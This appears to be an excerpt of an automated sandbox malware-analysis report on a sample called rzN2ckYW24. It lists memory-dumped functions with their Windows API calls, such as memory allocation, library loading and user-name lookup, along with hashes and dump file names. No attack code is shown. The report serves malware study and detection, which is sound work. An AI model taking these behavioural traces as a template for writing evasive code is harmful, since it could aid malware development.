Opcode Fuzzy Hash: b7f17075830edf1fdb0a3a799444c4b5fb2f7d2f8279fce9cc389d7e09e63c22
Instruction Fuzzy Hash: 81D1BA38906228CFCB64DF24D89DA9CBBB2BF45305F1045D9E54AA2345CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C483FB Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2cf4474cce03acb01e0e5644c64de350d6e761b87ed36f42188ae31a4eb8449c
Instruction ID: a1f14d62795ab670f0044eebfb1c47359cc9497697993704e04adf02d921d96a
Opcode Fuzzy Hash: 2cf4474cce03acb01e0e5644c64de350d6e761b87ed36f42188ae31a4eb8449c
Instruction Fuzzy Hash: BFC1BA38906228CFCB64DF24D89DA9CBBB2BF49305F1045D9D54AA2345CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48440 Relevance: 3.2, APIs: 2, Instructions: 235COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0d22c8df516c22007a729c4f866c0606cae65c45ab953904c6f6909ff7e574a6
Instruction ID: ee185f60888778ca8c2c0dd71d27322283e68ed433e7c25b92b665ebdc2430af
Opcode Fuzzy Hash: 0d22c8df516c22007a729c4f866c0606cae65c45ab953904c6f6909ff7e574a6
Instruction Fuzzy Hash: 3BC1CA38906228CFCB64DF24D89DA9CBBB2BF45305F1045D9D54AA2345CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48485 Relevance: 3.2, APIs: 2, Instructions: 228COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 812b4c47bb0eb91435cfe7007bb7d1050cba78f066f5b21ef5e8700275251582
Instruction ID: f169995448cbaf57b9de614ccfb949277cd24aaee62b3a987599e6283fe35c1c
Opcode Fuzzy Hash: 812b4c47bb0eb91435cfe7007bb7d1050cba78f066f5b21ef5e8700275251582
Instruction Fuzzy Hash: E3C1B938906228CFCB64DF24D88DA9CBBB2BF49305F1045D9E44AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C484CA Relevance: 3.2, APIs: 2, Instructions: 221COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 87cf5cb32d23da2c64d37bdf1441b270585573bb3016ba9e2da54b8220696fd3
Instruction ID: 502086427e391f3b37e2c6f51cf3e6402dc7ec0c4ff8db9d1385829ffe2e679a
Opcode Fuzzy Hash: 87cf5cb32d23da2c64d37bdf1441b270585573bb3016ba9e2da54b8220696fd3
Instruction Fuzzy Hash: C5B1B838906268CFCB64DF24D88DA9CBBB2BF49345F1045D9E44AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C4850F Relevance: 3.2, APIs: 2, Instructions: 214COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cfafd160cfeec9352fe99b4c14fb0e4fb7347bffabe51ad699f838982607b7c6
Instruction ID: 5a6a11ea61bf1b51166c42899eae8872f08b6244012c8f0bb6018b165337397e
Opcode Fuzzy Hash: cfafd160cfeec9352fe99b4c14fb0e4fb7347bffabe51ad699f838982607b7c6
Instruction Fuzzy Hash: DCB1BA38906268CFCB64DF24D88DA9DBBB2BF49345F1045D9D44AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48554 Relevance: 3.2, APIs: 2, Instructions: 207COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ed182c9e736776528a0ed0d42d732a16b7be344c3d4d215569e1d0b88e156cf7
Instruction ID: 5d0ab1458a640d026abb13ac795986748c2342f569c1b85a20739bd79b1637fb
Opcode Fuzzy Hash: ed182c9e736776528a0ed0d42d732a16b7be344c3d4d215569e1d0b88e156cf7
Instruction Fuzzy Hash: 2EB1B938906228CFCB64DF24D88DA9DBBB2BF49346F5045D9E44AA2385CB359DC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48599 Relevance: 3.2, APIs: 2, Instructions: 198COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3d31f9c234ba9e30d470cfd79a1fb54db59d1b77026753957423fbca7db927aa
Instruction ID: f71de307a8b0c21a5350f686ff2cb64ef688377638d6148dba56806649a8bcde
Opcode Fuzzy Hash: 3d31f9c234ba9e30d470cfd79a1fb54db59d1b77026753957423fbca7db927aa
Instruction Fuzzy Hash: B8A1B838906228CFCB64DF24D88DA9DBBB2BF49346F5045D9E44AA2385CB359DC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C485D5 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C485F9
KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 13729a9cd8860f3b265c9729132755ae6dad330b578486103d60dbe161cdd7df
Instruction ID: 3d3ec8aacea8a86d461105b52ca4c43ccc66ae85dc8e49140b30b7e314c1d11e
Opcode Fuzzy Hash: 13729a9cd8860f3b265c9729132755ae6dad330b578486103d60dbe161cdd7df
Instruction Fuzzy Hash: 98A1B838906228CFCB64DF24D88DA9DBBB2BF49345F5045D9E44AA2385CB359EC5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00E80878 Relevance: 1.8, APIs: 1, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00E80B16

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 79d36c16ad8d2a48248455b006dad012b7f85d4d359f126e257803f77d2ce51d
Instruction ID: 6266c78438e189417adeab22d18405fcd600bb27e9c4c5f6e0cff2aac9ff5c17
Opcode Fuzzy Hash: 79d36c16ad8d2a48248455b006dad012b7f85d4d359f126e257803f77d2ce51d
Instruction Fuzzy Hash: E3818C71E042488FDB64DFA9D88179DBBB0EF89324F10846AE50DF7291D7349C49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05C48630 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 42aa46e85bf81727887403990ef0a76d96f8fbaa6201c3c8c9b4cc0eb4f3fb3a
Instruction ID: d60fb60eb103837f6f102b40cd86fb9a402efd06e7ba9d30395bcb65b25741e1
Opcode Fuzzy Hash: 42aa46e85bf81727887403990ef0a76d96f8fbaa6201c3c8c9b4cc0eb4f3fb3a
Instruction Fuzzy Hash: CB91A838906228CFCB64DF24E88DA9DBBB2BF49345F5045D9E44AA2385CB359DC1CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48675 Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b9935c1048ba30f87b3fa8a30d5e8d4ad289ba52fadbced39d1c13be8583d6a9
Instruction ID: e3ab685be3bcdf0095426b7308923ed8cebe4f42aa89f013ca8e86e3255b30b7
Opcode Fuzzy Hash: b9935c1048ba30f87b3fa8a30d5e8d4ad289ba52fadbced39d1c13be8583d6a9
Instruction Fuzzy Hash: 2E91B938906228CFCB64DF24E88DA9DBBB2BF46345F1045D9E44AA2385CB359DC1CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C486BD Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 19709861f17c5cf97468f8e9edd35c83d08a5fbe33db44807edb317bc0cd1b53
Instruction ID: d6b5a5abbf9831282d2b78ced38effda4cf825ad6c9cf91e20092786c3c8cc23
Opcode Fuzzy Hash: 19709861f17c5cf97468f8e9edd35c83d08a5fbe33db44807edb317bc0cd1b53
Instruction Fuzzy Hash: 1C919638906228CFCB64DF24E88DA9DBBB2BF45345F1045D9E44AA2385CB359EC5CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05C48705 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3cde6214522111425210c5f7be6308b4cdbdcdbe5397eeaf1ee6b5143051c011
Instruction ID: 585209d2f6039ed175ae15112744845b7a29ce2e78a80868f339ebff1677cd39
Opcode Fuzzy Hash: 3cde6214522111425210c5f7be6308b4cdbdcdbe5397eeaf1ee6b5143051c011
Instruction Fuzzy Hash: 8981C938906228CFCB64EF24E88DA9DBBB2BF45345F1045D9E44AA2385CB359DC1CF21

Uniqueness

Uniqueness Score: -1.00%

Function 05C48741 Relevance: 1.7, APIs: 1, Instructions: 154COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 762324c1b4d2f23951a82e896e33435e292e97cef4dcd3f01534c9b065705ec8
Instruction ID: 930a7c92cd8d5a548125a822825e496284a8a080914fb06207e32c5fc6a2d34c
Opcode Fuzzy Hash: 762324c1b4d2f23951a82e896e33435e292e97cef4dcd3f01534c9b065705ec8
Instruction Fuzzy Hash: C781B938906228CFCB64DF24D88DA9DBBB2BF49345F1045D9D44AA2385CB359EC1CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05C48789 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 429828b35a460c035c588a46dcbd3e15d124917b39976f65e2d38fd3e729d95d
Instruction ID: 61cbbf451ba717068f390e71692fed4e3f48b7903b3982c97ae3417d27cbc3e3
Opcode Fuzzy Hash: 429828b35a460c035c588a46dcbd3e15d124917b39976f65e2d38fd3e729d95d
Instruction Fuzzy Hash: F371B938906228CFCB64EF64E88DA9CBBB2BF46345F1045D9D54AA2385CB359DC1CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05C487C5 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c9a48ada3d42dbd79c4710c5cd7cedb3401dafc7e54ea116c231930b86994e55
Instruction ID: de8bab44b292b0875f28d77f9dbc35e07d257ad53fa61b273b196f845673ff19
Opcode Fuzzy Hash: c9a48ada3d42dbd79c4710c5cd7cedb3401dafc7e54ea116c231930b86994e55
Instruction Fuzzy Hash: 7971A738906228CFCB64DF24D88DA9CBBB2BF45345F5045D9D54AA2385CB359EC1CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05C45DD5 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05C45F1B

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 643571d5a88645f8eeaf347a6d9f3c9b5ecf90da70cc47279c159f1645870856
Instruction ID: 0a39c4d4f83a86da7f32d0b67a774fca05e7fc3a96997a6c2d9c8465adbab96a
Opcode Fuzzy Hash: 643571d5a88645f8eeaf347a6d9f3c9b5ecf90da70cc47279c159f1645870856
Instruction Fuzzy Hash: 225104B4D102188FDB14CFA9C889BDDBBF1BF48314F15852AE816AB390D7789844CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C45B74 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05C45F1B

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7238d6f7914646c1f78be279b5a4acced0a882420470750f626c629f98e5d75
Instruction ID: 838a89464c48d91468911059b21becd9761c3cbcfcfe6d9a36d94815a123c515
Opcode Fuzzy Hash: a7238d6f7914646c1f78be279b5a4acced0a882420470750f626c629f98e5d75
Instruction Fuzzy Hash: 845104B4D102188FDB14CFA9C889BDDBBF1BF48314F15852AE816AB391D778A844CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C4880D Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 007d4a40936129779af62365ba8157e400632a93af3db7b35b8cccdaa9d29ae5
Instruction ID: 727ecf641106b28830a88fc2490b5d7352a5613dea905b1fdc0f1a56060c657e
Opcode Fuzzy Hash: 007d4a40936129779af62365ba8157e400632a93af3db7b35b8cccdaa9d29ae5
Instruction Fuzzy Hash: F261A938902228CFCB64DF24D88DA9CBBB2BF45345F5045D9D54AA2385CB359EC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05C48855 Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5ae9bc894d0cdc4821062df39b79bba2f6561dcde9a8acbce335584b7c743868
Instruction ID: 9ba2c2533488ef3014fef892f80321bd9fd1c87fb2192ae0c682b3a632053c79
Opcode Fuzzy Hash: 5ae9bc894d0cdc4821062df39b79bba2f6561dcde9a8acbce335584b7c743868
Instruction Fuzzy Hash: B851B838902228CFCB64EF64D88DA9CBBB2BF45345F1045D9D54AA2385CB359EC1CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05C4889D Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C488C4

Memory Dump Source

Source File: 00000002.00000002.529427624.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c40000_rzN2ckYW24.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 835a996b87df8022768d9fb7670fe40a52024565f7203e075a6fa035b0bc03af
Instruction ID: 25e1cf2fda46b565ebc723aca0d8d8876331f84d5c6c80d1db902ed359439811
Opcode Fuzzy Hash: 835a996b87df8022768d9fb7670fe40a52024565f7203e075a6fa035b0bc03af
Instruction Fuzzy Hash: B751B838902228CFCB64EF24D88DA9CBBB2BF46345F5045D9D54AA2395CB359EC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E8D6CD Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00E8D7A2

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 171b6f15be3ec62eb4b30a09e07dded75ce800233d4593f87413559a8e7fc066
Instruction ID: 433c971516f3af973100bb4bb40afd5b7a4f0c3f6992f239cd03ba1bd4324a93
Opcode Fuzzy Hash: 171b6f15be3ec62eb4b30a09e07dded75ce800233d4593f87413559a8e7fc066
Instruction Fuzzy Hash: 383142B0D042498FDB14EFA9D98579EBBF1FB08314F14812AE819F7280E7799845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B794 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00E8D7A2

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b70dd1cb6d1eb0a408bb72cc0b72a6ef86a717dc8e63a3f8ff5bd436717cf461
Instruction ID: af737287428e1b2bc6f79c8c74b93484666b4a5bed61d824018826e358200f98
Opcode Fuzzy Hash: b70dd1cb6d1eb0a408bb72cc0b72a6ef86a717dc8e63a3f8ff5bd436717cf461
Instruction Fuzzy Hash: 383143B0D082488FDB14EFA9D98579EBBF1FB48314F10812AE819F7280E7759845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E857FF Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00E8588A

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 387b4fbc8b01e780b8e967352b07a1d6c0381f62132734f10122470e95a0f61f
Instruction ID: 7a2a4f4e5a07bb9832367b75fc9fb5cdf0191fb7b6aed8771abd6b3527d3a23a
Opcode Fuzzy Hash: 387b4fbc8b01e780b8e967352b07a1d6c0381f62132734f10122470e95a0f61f
Instruction Fuzzy Hash: 5831E176806345CFDB10DFA0E94939ABFF0EF02314F14946AD409A7292CB796908CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E80A93 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00E80B16

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 97d7ff969ed49e29a43d14a13a69b0900eb90585e963cdbce83403696c5a5a63
Instruction ID: ac4b4c3c45d8f67a037a1bbf0664a12d2be1457b9d4178993fbc2b476fd9072d
Opcode Fuzzy Hash: 97d7ff969ed49e29a43d14a13a69b0900eb90585e963cdbce83403696c5a5a63
Instruction Fuzzy Hash: 1E2164B29042489FCB10CFAAC885BDFBFF4EF49324F148419E559A7210D375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E80558 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00E80B16

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 638ea936707486dfd8cc2c1ed35233adf75c6ce74fe65c24289a6aaaa33cda8b
Instruction ID: aed15dcd517007c285a3ae0f2e10104099024aeff0393b80896a5c4579449800
Opcode Fuzzy Hash: 638ea936707486dfd8cc2c1ed35233adf75c6ce74fe65c24289a6aaaa33cda8b
Instruction Fuzzy Hash: BC1112B19042489FCB50DF9AD884BDEBBF4EF89324F108429E519B7250D375A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E85810 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00E8588A

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 23f2d20a44a84865a002c27deadbef77f5e684137025db9a948e11dc46290361
Instruction ID: a350d3cc9921b55722f4d2f8c6e84d104ffdd1b14d81147e15ed2b17504257e0
Opcode Fuzzy Hash: 23f2d20a44a84865a002c27deadbef77f5e684137025db9a948e11dc46290361
Instruction Fuzzy Hash: B9119A76901309CFCB20DFA9E84879EBBF4EB49314F20842AD409B3641DB79A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8054C Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 00E80BBF

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f58499b84d6c2480a3c2ee717de864bb2358e98e96da4151a1e88c11b40446e5
Instruction ID: b58f1cb731ff0622fcf9ef4ee11fa759e26fad20e0094ea4229a36ae00381ee0
Opcode Fuzzy Hash: f58499b84d6c2480a3c2ee717de864bb2358e98e96da4151a1e88c11b40446e5
Instruction Fuzzy Hash: 8C1112B19046498FCB10DF9AD885BDFFBF4EB48328F108469D929B7240D3B4A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E80B5A Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 00E80BBF

Memory Dump Source

Source File: 00000002.00000002.521615048.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_rzN2ckYW24.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b62445c8000aa7b356f2d3dce1b25e1be1bf088593ead8b3b3b66872027fb185
Instruction ID: 3f3d7c6c9310efb179816382f10881cdc2bbbc796f8cf91cf2a32db865b26367
Opcode Fuzzy Hash: b62445c8000aa7b356f2d3dce1b25e1be1bf088593ead8b3b3b66872027fb185
Instruction Fuzzy Hash: 171130B18042488FCB10DF9AD886BDFFBF4EB49328F108419D569B7200C3B4A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06526F30 Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.530232972.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6520000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2cd5e0723e5aca17136558163809c731e19a65bbf81525a100a2d9188b0acd
Instruction ID: 9dee9f098173ebb43596aacba7aa74a05025dba51e2c2b9032f923117aac1300
Opcode Fuzzy Hash: 3b2cd5e0723e5aca17136558163809c731e19a65bbf81525a100a2d9188b0acd
Instruction Fuzzy Hash: 94126830A00221CFCB64EBA4D458A6EBBF2FF89355F14896DE4069B791EB759C45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 065277E0 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.530232972.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

